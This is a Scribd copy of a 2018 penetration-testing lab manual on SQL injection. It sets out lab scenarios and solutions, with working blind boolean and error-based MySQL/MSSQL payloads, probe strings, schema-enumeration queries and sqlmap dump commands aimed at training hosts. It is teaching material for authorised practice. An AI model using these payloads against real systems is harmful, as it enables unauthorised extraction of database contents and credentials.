KEMBAR78
© 2018 Caendra Inc. - Hera For Waptv3 - SQL Injection | PDF | Microsoft Sql Server | Databases
0% found this document useful (0 votes)
217 views41 pages

© 2018 Caendra Inc. - Hera For Waptv3 - SQL Injection

Uploaded by

Saw Gyi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
217 views41 pages

© 2018 Caendra Inc. - Hera For Waptv3 - SQL Injection

Uploaded by

Saw Gyi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 41

© 2018 Caendra Inc.

| Hera for WAPTv3 | SQL Injection 1


In these SQL Injection labs, the student can practice attacks techniques to discover and
exploit SQL Injections against different DMBS and platforms.

Once you are connected in VPN to the lab environment, all the web applications will be
available at the following URL: http://info.sqli.site/.

There are three main sections for each type of lab: Video, Lab, Challenges.

• Video section contains web applications used during video lessons. Therefore, if
you need any information about the scenario, the attacks and so on, please refer to
the corresponding video.
• Labs section contains web application where you can practice the techniques of the
specific module and have solutions. You can find them later in this manual
• Challenges labs do not have solutions; otherwise, why call them challenges? If you
study the course and think like a penetration tester, you will achieve the goal!

The best tool is, as usual, your brain. Then you may need of:

• Web Browser
• Burp Suite
• Sqlmap

Once you have your virtual network ready, configure the following IP address as default
DNS: 10.100.13.37

• WINDOWS: change the property of the TAP network device, adding as first DNS
server of the IP of the server.
• LINUX: add an entry into /etc/resolv.conf file with the IP address of the server

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 2


Please use these credentials to log into the following web applications:

Web app Username Password


http://1.challenge.sqli.site giovanni mycoolpass

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 3


Online library is a web application used to consult a library catalog. It uses a database to
store information about books and the application is vulnerable to SQL injections.

You know that the DBMS is MySQL and that the parameter Header User-agent on the
page getBrowserInfo.php is not sanitized correctly by the web application. This means
that it is processed by the DBMS, and is injectable.

The injection is a BLIND SQL injection, so you cannot use the UNION technique to extract
your data.

Extract the database structure and any data.

• How to use the BLIND exploitation technique


• How to extract data manually
• How to automate the same exploit with sqlmap

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 4


Online library is a web application used to query a library catalog. It uses a database to
store information about the books it knows about and it is vulnerable to SQL injections.

You will enumerate each parameter that is vulnerable to SQL injection.

Find the parameters that are vulnerable to SQL injection.

• The methods to use to find SQL injections


• How to find SQL injections
• How to detect the injection type
• How to use Burp suite to find SQL injections

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 5


Online library is a web application used to consult a library catalog. It uses a database to
store information about its books and it is vulnerable to SQL injections.

You will detect the vulnerable page, then exploit it to extract any data that you can from the
database.

Extract the database structure and any data.

• How to detect Error-Based SQL injections


• How to extract data manually (Error-Based technique)
• How to automate the exploitation with sqlmap (Error-Based technique)

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 6


Poema is a small club of people loving books, poetry and spiritualism. They do not drink
alcohol and do not party. They read and think.

They have put up a website where they can share with the world their reading preferences,
preferred authors and photos.

The club has a Vice President of Bookshelf and a Club President. They are the most sage
and blessed members and live a life of books, introspection and asceticism

You want to find SQL injection vulnerabilities in the website, determining the type of SQL
injection and its exploitability You will also have to extract information from the database
exploiting the vulnerability

• Find out Ruud password in the database

• How to find SQL injection vulnerabilities manually


• How to determine if a SQL injection is of type “blind” or “error based”
• How to extract information from a database using sqlmap

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 7


Poema is a small club of people loving books, poetry and spiritualism. They do not drink
alcohol and do not party. They read and think.

They have put up a website where they can share with the world their reading preferences,
preferred authors and photos.

The club has a Vice President of Bookshelf and also a Club President. They are the most
sage and blessed members and live a life of books, introspection and asceticism.

You want to exploit an Error based SQL injection manually in order to dump data from the
database. You will have to first determine the remote DB version, current user and selected
database. Then proceed to schema enumeration and data dump

• Find out Ruud password in the database

• How to find SQL injection vulnerabilities manually


• How to determine if a SQL injection is of type “blind” or “error based”
• How to extract information from a database using error based techniques and only a
web browser

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 8


Arrogant Bank inc. is a bank with a modern web interface that will let you perform a
number of operation such as…hmmm…knowing how much money you have in the account.
You are Giovanni, a good guy, frustrated by life with an account on this bank:

• Username: giovanni
• Password: mycoolpass

This bank is particularly arrogant and makes fun of poor account holders. You happen to be
the poorest account holders (hence frustration).

You want to find SQL injection vulnerabilities in the website, determining the type of SQL
injection and its exploitability. You will also have to extract information from the database
exploiting the vulnerability

• Find out the password of the richest in bank


• Become the richest in the bank, to gain respect

• Inspection of the application logic with burp proxy


• Discovery of a SQL injection
• Exploitation of a SQL injection with sqlmap

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 9


Poema is a small club of people loving books, poetry and spiritualism. They do not drink
alcohol and do not party. They read and think.

They have put up a website where they can share with the world their reading preferences,
preferred authors and photos.

The club has a Vice President of Bookshelf and also a Club President. They are the most
sage and blessed members and live a life of books, introspection and asceticism.

Website has recently undergone further development and bug fixes although database
structure has not changed.

You want to find SQL injection vulnerabilities in the website, determining the type of SQL
injection and its exploitability.

You will also have to extract information from the database exploiting the vulnerability.
This time you have to determine whether you can use a tool and eventually if you can use
any other manual and more direct technique

• Find out Ruud password in the database

• How to find SQL injection vulnerabilities manually


• How to determine which is the best SQL injection technique to use in certain cases
• How to extract information from a database using direct queries

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 10


Please go ahead, only if you are really stuck or if you have
completed the labs.

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 11


A Blind SQL injection occurs when the attacker succeeds in injecting SQL code but despite
trying the UNION injection, he cannot force the web server to return data.

The attacker can only tell that the injection has been run (with or without a result set) and
nothing else. In other words, the web server returns only a BOOLEAN value but no
database data.

The attacker must ask a simple Boolean question to the web server to determine success.
For example, to get the first character of the current schema, the attacker could ask:

• Is the first letter of the current database name ‘a’ ?


• Is the first letter of the current database name ‘b’ ?
• Is the first letter of the current database name ‘c’ ?
• Is the first letter of the current database name ‘d’ ?
• ...

This approach can take a very long time and is not optimal, of course. For example, to get
the complete name of the current schema (suppose a characters domain: [a-z]) the attacker
could perform 26*N (the length of the schema name) injection queries in the worst case.

Most of the injection tools make use of bisection algorithms. These algorithms perform
operations on the ASCII encoding of the characters and reduce the characters domain to
test.

In the previous example, for instance, an attacker could ask the following question:

• Is the encoding ASCII of the first character of the current schema < encoding
ASCII (‘o’)?

If the web application replies with TRUE, the next attempt will be tried from all characters
with ASCII encoding < ‘o’ : [a-o]. If the web app replies with FALSE, the next attempt will be
from among all characters with ASCII encoding > ‘o’ : [p-z].

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 12


You will run the following tasks:

• Detecting the TRUE and FALSE conditions


• Detecting the structure of the injection payload
• Data extraction
o You will manually extract the name of the user used by the web
application.
o You will extract all of the data with sqlmap

This step is fundamental in building the injection payload (Tasks 2 and 3). You need to find
out which input data forces the query to return a result set and which does not.

You don’t know how the web application has been developed but it is likely that the web
application makes use of a similar SQL query to process the browser.

SELECT * FROM browser WHERE name = <Header HTTP User-Agent>

You know that the TRUE condition is verified by this payload:

User-agent = ' OR 'a '= 'a

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 13


The web application responds by sending the message ‘It’s nothing new’; this message is
obviously related to the TRUE condition and you will receive it when your payload causes
the query to have a result set.

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 14


And the FALSE condition is verified by this payload:

User-agent = ' OR 'a '= 'b

The web application reacts by sending the message ‘Detected a new browser’; this message
is obviously related to the FALSE condition and you will receive it when your payload
causes the query to have an empty result set.

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 15


Your payload injection should then have the following structure:

User-agent = ' OR <your SQL boolean question>

If the web server replies with the message related to the TRUE condition (“It’s nothing
new”), the answer to your question was true, otherwise the question is wrong and you
must ask a new one.

For example, to get the first character of the current schema name, you could iterate all the
following queries until you reach the TRUE condition.

• User-agent = ' OR SUBSTRING(database(),1,1) = 'a


• User-agent = ' OR SUBSTRING(database(),1,1) = 'b
• User-agent = ' OR SUBSTRING(database(),1,1) = 'c
• User-agent = ' OR SUBSTRING(database(),1,1) = 'd
• User-agent = ' OR SUBSTRING(database(),1,1) = 'e

A wrong answer (The first letter is not ‘a’)

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 16


A correct answer (the first letter is ‘e’):

In this task, you will extract some data manually. As an example, you will need to get only
the current DB user running the queries for the web application.

After that, you will use sqlmap to extract any extra data from the database.

Detecting the current DB user

The first step is to get the current user of the database. We know that the DBMS is MySQL,
so you can use the following query to get it:

SELECT user() or simply user()

Let us demonstrate how to run the exploit. You will use the bisection technique to get the
user value, character by character quickly, and you can assume that the character domain
of the user value is [a-z].

Attempt 1 – Detecting first character

• Character interval: [a-z]


• ASCII interval: [97 – 122]

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 17


• ASCII flag: 109
• Character flag: m
• Payload: ' OR ASCII(SUBSTRING(user(),1,1))<=109 #

The web application returns the message related to the FALSE condition, so you can tell
that the target character will be in the smaller interval [n-z].

Attempt 2 – Detecting first character

• Characters interval: [n-z]


• ASCII interval: [110 – 122]
• ASCII flag: 116
• Character flag: t
• Payload: ' OR ASCII(SUBSTRING(user(),1,1))<=116 #

The web application returns the message related to the FALSE condition, so you are sure
that the target character will be in the reduced interval [u-z].

Attempt3 – Detecting first character

• Characters interval: [u-z]


• ASCII interval: [117 – 122]
• ASCII flag: 119
• Character flag: w
• Payload: ' OR ASCII(SUBSTRING(user(),1,1))<=119 #

The web application returns the message related to the TRUE condition, so you are sure
that the target character will be in the reduced interval [u-w].

Attempt4 – Detecting first character

• Characters interval: [u-w]


• ASCII interval: [117 – 119]
• ASCII flag: 118
• Character flag: v
• Payload: ' OR ASCII(SUBSTRING(user(),1,1))<=118 #

The web application returns the message related to the TRUE condition, so you are sure
that the target character will be in the reduced interval [u-v].

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 18


Attempt5 – Detecting first character

• Characters interval: [u-v]


• ASCII interval: [117 – 118]
• ASCII flag: 117
• Character flag: u
• Payload: ' OR ASCII(SUBSTRING(user(),1,1))<=117 #

The web application returns the message related to the TRUE condition, as the interval
contains only one element you can conclude that it is the right one. So the first character of
the user name is ‘u’.

If you continue with the other characters of the name, you will get this value:

• user

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 19


Data extraction with sqlmap

sqlmap.py -u http://s1-
17395bzxy.roma.coliseumlab.net/getBrowserInfo.php --dbs --dump -
-technique=B --keep-alive --level=3

Where

• --dbs
o Enumerate DBMS databases
• --dump
o Dump DBMS database table entries
• --technique=B
o SQL injection technique to test for
o B stands for Boolean based SQL injection
• --keep-alive
o Use persistent HTTP(s) connections
• --level=3
o Level of tests to perform
o The HTTP User-agent header is tested against SQL injection only if the
level is set to 3 or above

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 20


The tasks before you are:

• Detecting which parameters the web application analyzes


• Analyzing each of them to check whether they are vulnerable
• Detecting the injection type (Blind, Error-Based, etc.)

The web application can be designed to receive parameters via different methods. The
most commonly used methods are:

• POST
o The parameters are available in the content of the HTTP POST request.
• GET
o The parameters are available in the URL of the HTTP GET request.
• COOKIE
o The parameters are available in the COOKIE header of the HTTP request.

But, the web application could process parameters from any HTTP Request header, for
example:

• User-Agent
• Referrer
• Accept-Language
• Etc.

Your first step is to configure Burp proxy to draw a map of the HTTP requests made from
your browser. First, configure the scope, copy the main URL of the web application and use
the Paste URL button in Burp proxy.

Note that in this step, there is really no need to intercept the requests / responses because
your goal is simply to draw a map.

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 21


Now, move back over to your browser and explore the features of your web application, for
example: explore the available books. Your browser will generate HTTP requests to get all
of the information about the books that you request.

Come back to Burp suite to gather the HTTP requests made by your web application and
select the Target tab, then the Site map sub-tab.

Here, you can review each of the HTTP requests made by your browser. By default, the
HTTP requests in the list are filtered by MIME type: you will not be able to see any requests
for images or .css files.

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 22


You will note that there are many HTTP requests but only two really seem to be
interesting:

• GET /getBookInfo.php?id=<bookID>
• GET /getBrowserInfo.php

The first request is a parameterized request and uses the parameter id to get information
about a given book from the database.

The second request does not use a GET/POST parameter but the name related to the page
(getBrowserInfo) could suggest that the User-Agent HTTP header is being processed by
the web application.

Note that as the attacker, you do not know how the web application has been coded. A
complete pen test against SQL injections would include a check of each possible parameter
(on GET, POST or any HTTP header). This would, of course, take an extremely long time.

So, you have restricted your search to few pages. Now, you should check if any of the
following parameters are vulnerable:

• GET.id
o On the URL /getBookInfo.php?id=<bookID>
• Header User-Agent

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 23


o On the URL /getBrowserInfo.php

For each parameter that you found above, you should send a probe payload. This is a
special payload that you will use to check whether the parameter is vulnerable or not.

Classical probe data include the following characters:

• ' (string terminator)


• ;
• , (list elements separator)
• -- (comment)

Or, you can use slightly more sophisticated probe data:

• ' OR 'a'='a (TRUE condition for string values)


• ' OR 'a'='b (FALSE condition for string values)
• 999999999999 OR 1=1 (TRUE condition for numeric values)
• 999999999999 OR 1=2 (FALSE condition for numeric values)

You will need to send this probe data and then compare the behavior of the web
application with the default behavior. (i.e.: you need to determine if the server’s response
changes with differing inputs.)

Parameter GET.id

First, select the request that you need to send probe data to from the Site Map and send it
to Burp Repeater.

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 24


Next, you need to inject your payload into the URL of the HTTP GET request. To do this,
change the URL’s parameters:

• id: '

The URL of the HTTP request will be /getBookInfo.php?id=' .

Press the GO button and wait for the HTTP response.

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 25


The web application returns a message describing a DB error:

Invalid query: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the
right syntax to use near ''' at line 1

It should be pretty clear, now, that the web application does not filter the quote character,
so you should take this as a hint to try and inject your payload here.

It’s likely that the web application makes use of a SQL query to get data about a book using
its id.

• SELECT * FROM book WHERE id = <id>

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 26


For example, you can use the following payload to make the query always TRUE:

• id: 999999999999 OR 1=1


• URL: /getBookInfo.php?id=999999999999 OR 1=1

Or you can use the following payload to make the query always return FALSE:

• id: 999999999999 OR 1=2


• URL: /getBookInfo.php?id=999999999999 OR 1=2

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 27


You can conclude from this behavior that the web application is vulnerable to SQL
injections of the parameter id on the page getBookInfo.php.

The injection can be exploited with the UNION technique, because the HTTP response after
the injected payload returns data from database (the TRUE Boolean condition tested above
returned data about the Merchant of Venice book).

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 28


Parameter Header User-agent

Select the HTTP request from the Site map and send to Burp Repeater.

Now go to the Repeater tab, update the HTTP User-agent request header with your test
probe and press the Go button:

• Header HTTP User-agent : '

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 29


The web application returns the message ‘Detected a new browser’.

If you repeat that HTTP request, you will get the same message; note that this behavior
differs from default.

If you send multiple requests with the same User-Agent (for example: Chrome) you will get
two different responses:

• For the first request, you will get a response containing the message
‘Detected a new browser’
• For all subsequent identical requests, you will get a response containing the
message ‘It's nothing new’

At first glance, you can guess that the header User-agent seems to be processed by the
web application and stored into the database.

When the web application receives a request from a new browser, that request seems to be
stored, and the message ‘Detected a new browser’ will be sent.

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 30


When the web application receives a request from an already-detected browser, it may or
may not be stored and the message ‘It's nothing new’ will be sent.

It is likely that the web application makes use of a similar SQL query to check if the browser
has previously been detected.

SELECT * FROM browser WHERE name = <Header HTTP User-Agent>

It is also likely that the web application makes use of a similar query to add the browser to
the detected browsers list.

INSERT INTO BROWSER VALUES (<Header HTTP User-Agent>)

Don’t forget that as the attacker, you may not know the code of the web application but you
must think like the developer of that web application.

You have, of course, noticed some strange behavior : the web application responds with the
message (‘Detected a new browser’) when you send a test probe using the following
payload:

• Header HTTP User-agent : '


As noted before, you should expect this message for the first response. Why are you seeing
this in subsequent responses?!

It could be a blind SQL injection; to confirm that, you should build two different payloads
verifying two Boolean conditions.

You can use the following payload to make the query always TRUE (TRUE Boolean
condition):

• Header HTTP User-agent : ' OR 'a'='a

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 31


The web application returns the message ‘It's nothing new’, as you would expect.

You can use the following payload to make the query always FALSE (FALSE Boolean
condition):

• Header HTTP User-agent : ' OR 'a'='b

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 32


The web application returns the message ‘Detected a new browser’, also as you would
expect.

In both of the preceding cases, the web application does not return any information from
the DB or any error message but the injection is obviously available.

This type of injection is called Blind SQL injection; to exploit these, the attacker can run
queries satisfying simple Boolean conditions.

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 33


Error-based SQL injections are special injections in which the attacker forces the DBMS to
generate an error that contains the needed information.

Let us try to show you a simple example. Consider a web application vulnerable to SQL
injection in the parameter id of the URL

• http://www.elsfoo.com/product.php?id=999 .

We will assume that the web application uses Oracle as its DBMS.

The attacker can insert special input that can force the DBMS to generate an error; for
example, by requesting the following URL:

http://www.elsfoo.com/product.php?id=999||UTL_INADDR.GE
T_HOST_NAME( (SELECT user FROM DUAL) )--
He will be able to read the information he really wants (the user) from the error returned
by the DBMS.

ORA-129869: host JAMES unknown


The difference between this and other injections is that the attacker gets the data they
want directly from the error.

Three conditions are necessary to determine the existence of an Error-Based SQL injection:

1. The DBMS
o Currently only MSSQL and Oracle display this error
2. The web application must collect DBMS errors and returns them to the client.
3. The web application does not filter input data properly permitting to an attacker
to run arbitrary SQL code.

If any of the previous conditions are not verified, the application may be immune to error-
based injection or SQLi altogether.

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 34


The tasks you will perform are:

1. Detecting the vulnerable parameter


2. Manually extract the database structure
3. Automated data extraction (with sqlmap)

The parameter id on the page getBookInfo.php is vulnerable to SQL injections.

If you insert the probe input ' you will get the following error from the MSSQL database:

[Microsoft[[SQL Server Native Client 10.0][SQL Server] Unclosed


quotation mark after the character string ''

The error message that you got indicates that the parameter id is vulnerable to SQL
injections and that the injection is Error-based because:

• The DBMS is Microsoft SQL server


• The web application does not filter the input data properly
• The web application receives the error from the DBMS and relays it back to the
client browser

Your goal is to obtain the database structure, so:

• DBMS and OS fingerprinting


o Any information you can gather about it (release, version etc.)
• Current user
o The user used by the web application to connect to the DBMS
• Current database
o And the schema used by the web application

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 35


• Database tables
• Table columns

You need to execute some specific queries to get this information. For example, the query
to get the DBMS version or the current user is different from DMBS to DBMS.

You can use this document MSSQL injection cheat sheet as a source for the resources you
may need.

As the attacker, you need to force the DBMS to generate an error that includes the
information that you need.

In the next examples, we will use the CAST statement to force the DBMS to convert the
necessary information to a string. We will compare this value (string type) to another
value (int type) with the only goal of triggering a DB error and reading the necessary
information from the error.

The payload will have this structure:

999 OR 1 = CAST (<SQL QUERY TO STEAL DATA> AS VARCHAR(4096))

where

• 999 is a numeric value that breaks the actual SQL query


• 1 is a numeric type
• CAST (. . .) is a string type expression and returns the information we’re
looking for.

You will get an error message because you are comparing two values of different types and
you will able to extract the target information you need from the error.

DBMS and OS fingerprinting

Use the following payload:

• 9999 OR 1=CAST(@@version as varchar(4096))

The web application will show the following error message:

[Microsoft][SQL Server Native Client 10.0][SQL Server]Conversion


failed when converting the varchar value 'Microsoft SQL Server
2008 R2 (SP2) - 10.50.4000.0 (X64) Jun 28 2012 08:36:30
Copyright (c) Microsoft Corporation Express Edition with

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 36


Advanced Services (64-bit) on Windows NT 6.1 (Build 7601:
Service Pack 1) (Hypervisor) ' to data type int.

You have collected interesting data:

• DBMS : SQL server Express 2008 R2 SP2 10.50.400 X64


• OS: Windows NT 6.1 SP1 (Windows Server 2008 R2 SP1)

Current user

Use the following payload:

• 9999 OR 1=CAST(user as varchar(4096))

The web application will show the following error message:

[Microsoft][SQL Server Native Client 10.0][SQL Server]Conversion


failed when converting the varchar value 'user' to data type
int.

The user used by the web application to connect to the DBMS is : user .

Current database

Use the following payload:

• 9999 OR 1=CAST(DB_NAME() as varchar(4096))

The web application will show the following error message:

[Microsoft][SQL Server Native Client 10.0][SQL Server]Conversion


failed when converting the varchar value 'ecommerce_books' to
data type int.

The schema used by the web application is: ecommerce_books .

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 37


Tables

Use the following payload to get the name of the first table in the schema:

• 9999 or 1 IN (SELECT TOP 1 CAST(name as varchar(4096)) FROM


[ecommerce_books]..sysobjects WHERE xtype='U')

The web application will show the following error message:

[Microsoft][SQL Server Native Client 10.0][SQL Server]Conversion


failed when converting the varchar value 'product' to data type
int.

To get the other tables you must perform the same query excluding the tables values that
you’ve already found.

For example, to get the second table, exclude the first:

• 9999 or 1 IN (SELECT TOP 1 CAST(name as varchar(4096)) FROM


[ecommerce_books]..sysobjects WHERE xtype='U' and name!=
'product')

The web application will show the following error message:

[Microsoft][SQL Server Native Client 10.0][SQL Server]Conversion


failed when converting the varchar value 'purchase' to data type
int.

At the end of the process, you get the tables:

• product
• purchase
• user

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 38


Table columns

Let us show you how to get the columns of the table user.

Use the following payload to get the first column of user :

• 9999 or 1 IN (SELECT TOP 1


CAST([ecommerce_books]..syscolumns.name as varchar(4096) )
FROM [ecommerce_books]..syscolumns,
[ecommerce_books]..sysobjects WHERE
[ecommerce_books]..syscolumns.id=[ecommerce_books]..sysobje
cts.id AND [ecommerce_books]..sysobjects.name='user')

The web application will show the following error message:

[Microsoft][SQL Server Native Client 10.0][SQL Server]Conversion


failed when converting the varchar value 'id' to data type int.

To get the other columns, you must perform the same query excluding the column values
that you’ve already found.

For example, to get the second column:

• 9999 or 1 IN (SELECT TOP 1


CAST([ecommerce_books]..syscolumns.name as varchar(4096) )
FROM [ecommerce_books]..syscolumns,
[ecommerce_books]..sysobjects WHERE
[ecommerce_books]..syscolumns.id=[ecommerce_books]..sysobje
cts.id AND [ecommerce_books]..sysobjects.name='user' AND
[ecommerce_books]..syscolumns.name !='id')

The web application will show the following error message:

[Microsoft][SQL Server Native Client 10.0][SQL Server]Conversion


failed when converting the varchar value 'username' to data type
int.

At the end of this process you know that the table user contains the following columns:

• id
• username
• password
• name

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 39


• surname
• country
• state
• city

If you want to extract data by using sqlmap, you must run the following command:

./sqlmap.py -u http://s1-172-
sbh.brundisium.coliseumlab.net/getBookInfo.php?id=1 --dbs --dump
--technique=E --keep-alive -p id

Where

• --dbs
o Enumerate DBMS databases
• --dump
o Dump DBMS database table entries
• --technique=E
o SQL injection technique to test for
o E stands for Error-Based SQL injection
• --keep-alive
o Use persistent HTTP(s) connections
• -p id
o Testable parameter

The following snapshot shows all of the content from the table purchase:

© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 40


© 2018 Caendra Inc. | Hera for WAPTv3 | SQL Injection 41

You might also like